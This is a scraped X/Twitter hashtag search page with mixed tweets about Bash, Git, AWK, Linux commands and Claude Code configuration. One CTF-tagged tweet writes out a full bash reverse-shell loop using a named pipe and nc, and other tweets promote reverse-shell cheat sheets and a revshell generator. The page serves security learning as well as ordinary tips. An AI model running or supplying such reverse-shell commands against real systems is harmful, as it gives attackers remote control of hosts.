#hadoopshellcommands 搜索结果

Git Commands Cheat sheet ----------------------------- @SketechWorld

SketechWorld's tweet image. Git Commands Cheat sheet
-----------------------------
@SketechWorld

Bash Scripting basics: Understanding (), {}, [], $(), $(()), ${}, and [[]]

sysxplore's tweet image. Bash Scripting basics: Understanding (), {}, [], $(), $(()), ${}, and [[]]

Getting ready to upload this custom command into the PAI repo.

DanielMiessler's tweet image. Getting ready to upload this custom command into the PAI repo.

The Complete Backend Development Tech Stack Core Programming Languages ├── JavaScript/Node.js (Runtime) ├── Python ├── Java ├── Go └── C# (.NET) Backend Frameworks ├── Node.js Ecosystem │ ├── Express.js │ ├── NestJS │ ├── Fastify │ └──…

e_opore's tweet image. The Complete Backend Development Tech Stack

Core Programming Languages
├── JavaScript/Node.js (Runtime)
├── Python
├── Java
├── Go
└── C# (.NET)

Backend Frameworks
├── Node.js Ecosystem
│   ├── Express.js
│   ├── NestJS
│   ├── Fastify
│   └──…

Linux common command infosheet. Download/Source suso.com/infosheets/she…

nixcraft's tweet image. Linux common command infosheet. 
Download/Source suso.com/infosheets/she…

Reverse Shell Cheat Sheet:- Bash. Perl. Python. PHP. Netcat. Socat. AWK. Powershell.

Alra3ees's tweet image. Reverse Shell Cheat Sheet:-

Bash.
Perl.
Python.
PHP.
Netcat.
Socat.
AWK.
Powershell.
Alra3ees's tweet image. Reverse Shell Cheat Sheet:-

Bash.
Perl.
Python.
PHP.
Netcat.
Socat.
AWK.
Powershell.
Alra3ees's tweet image. Reverse Shell Cheat Sheet:-

Bash.
Perl.
Python.
PHP.
Netcat.
Socat.
AWK.
Powershell.

🐧 AWK Master Cheat Sheet: 15 Must-Know Commands for DevOps & Linux Admins 🖥️

devops_tech's tweet image. 🐧 AWK Master Cheat Sheet: 15 Must-Know Commands for DevOps & Linux Admins 🖥️

Bash Scripting basics: Understanding (), {}, [], $(), $(()), ${}, and [[]] 𝘽𝙤𝙤𝙠 𝙮𝙤𝙪𝙧 𝘿𝙚𝙢𝙤: shorturl.at/Ev7j9

decabyte_info's tweet image. Bash Scripting basics: Understanding (), {}, [], $(), $(()), ${}, and [[]]

𝘽𝙤𝙤𝙠 𝙮𝙤𝙪𝙧 𝘿𝙚𝙢𝙤: shorturl.at/Ev7j9

Reverse Shell Bash Loop: - while true; do sleep 5 && mknod /dev/shm/p p; cat /dev/shm/p | /bin/bash -i | nc 127.0.0.1 9001 >/dev/shm/p; done - #CyberSecurity #CTF

0dayCTF's tweet image. Reverse Shell Bash Loop:
-
while true; do sleep 5 && mknod /dev/shm/p p; cat /dev/shm/p | /bin/bash -i | nc 127.0.0.1 9001 >/dev/shm/p; done
-
#CyberSecurity #CTF

If you're wondering how I get those colorized ping outputs — I use grc (Generic Colourizer). It works with so many tools straight out of the box (df, lsblk, free, ps and more). You can quickly install it with your package manager, for example: $ sudo dnf install grc Add these…

sysxplore's tweet image. If you're wondering how I get those colorized ping outputs — I use grc (Generic Colourizer).

It works with so many tools straight out of the box (df, lsblk, free, ps and more).

You can quickly install it with your package manager, for example:

$ sudo dnf install grc

Add these…

Did you know you can actually drop zeros in an IP address and it still works. For example: 10.20.0.2 → 10.20.2 10.0.0.68 → 10.68 Both reach the same host. It’s one of those neat little IP quirks I use in labs , saves me a few keystrokes every time 😅

sysxplore's tweet image. Did you know you can actually drop zeros in an IP address and it still works.

For example:
10.20.0.2 → 10.20.2
10.0.0.68 → 10.68

Both reach the same host.

It’s one of those neat little IP quirks I use in labs ,  saves me a few keystrokes every time 😅


Git is simple, but mastering commands takes practice. Here’s a cheat sheet you can rely on: 𝟭) Setup ↳ Initialize a new repository: git init ↳ Configure username and email: git config --global user.​name <your-name> git config --global user.​email <your-email> ↳ Clone a…

denicmarko's tweet image. Git is simple, but mastering commands takes practice.

Here’s a cheat sheet you can rely on:

𝟭) Setup
↳ Initialize a new repository: git init
↳ Configure username and email:
 git config --global user.​name &amp;lt;your-name&amp;gt;
 git config --global user.​email &amp;lt;your-email&amp;gt;
↳ Clone a…

I summarized 1.5 hr "BASH COMMANDS" video by @kirat_tw in the cohort. Covers all commands starting from basic (cd, mkdir etc) to advanced (sed, awk etc). This one took a lot of effort. So, limiting it only to the "interested" ones. (Comment below👇) Keep coding ✌️✨

its_ikD's tweet image. I summarized 1.5 hr &quot;BASH COMMANDS&quot; video by @kirat_tw in the cohort. 

Covers all commands starting from basic (cd, mkdir etc) to advanced (sed, awk etc).
 
This one took a lot of effort. 
So, limiting it only to the &quot;interested&quot; ones. (Comment below👇)

Keep coding ✌️✨
its_ikD's tweet image. I summarized 1.5 hr &quot;BASH COMMANDS&quot; video by @kirat_tw in the cohort. 

Covers all commands starting from basic (cd, mkdir etc) to advanced (sed, awk etc).
 
This one took a lot of effort. 
So, limiting it only to the &quot;interested&quot; ones. (Comment below👇)

Keep coding ✌️✨

Try this if you have challenge with the Shell application.

MSIngawa's tweet image. Try this if you have challenge with the Shell application.

Shells – A Script For Generating Common Revshells Fast & Easy skynettools.com/shells-a-scrip… #infosec #netsec #pentest #cybersecurity #bugbounty

SkyNetTools's tweet image. Shells – A Script For Generating Common Revshells Fast &amp;amp; Easy skynettools.com/shells-a-scrip… #infosec #netsec #pentest #cybersecurity  #bugbounty

🔷Want to master Command Line but struggling to find where to start ? Then here is the mega thread 🧵for you to start 🔷This thread covers Windows Commands, Power shell Cmdlets, Linux shell commands along side Mac 🔷You will get to know Kernels & Shells #Windows #Linux #macOS

DattaveerBoda's tweet image. 🔷Want to master Command Line but struggling to find where to start ? Then here is the mega thread 🧵for you to start
🔷This thread covers Windows Commands, Power shell Cmdlets, Linux shell commands along side Mac
🔷You will get to know Kernels &amp;amp; Shells

#Windows #Linux #macOS

These #Linux commands will make you a pro ———> youtu.be/gd7BXuUQ91w #it #command


Claude code Hooks can solve this. You just need a PreToolUse hook to check for bash command and it should handle it. I do mention in CLAUDE.md as well that it should always run with uv run gist.github.com/Pradeek/4ac429…


I set up a custom Claude Code status line that tells me the model, tokens used, cost, and time, live. See the screenshot below. Modify ~/.claude/settings.json to add this: { "statusLine": { "type": "command", "command": "~/.claude/statusline-command.sh" }…

DeeperThrill's tweet image. I set up a custom Claude Code status line that tells me the model, tokens used, cost, and time, live. See the screenshot below.

Modify ~/.claude/settings.json to add this:
 {
    &quot;statusLine&quot;: {
      &quot;type&quot;: &quot;command&quot;,
      &quot;command&quot;: &quot;~/.claude/statusline-command.sh&quot;
    }…

未找到 "#hadoopshellcommands" 的结果
未找到 "#hadoopshellcommands" 的结果
Loading...

Something went wrong.


Something went wrong.


United States Trends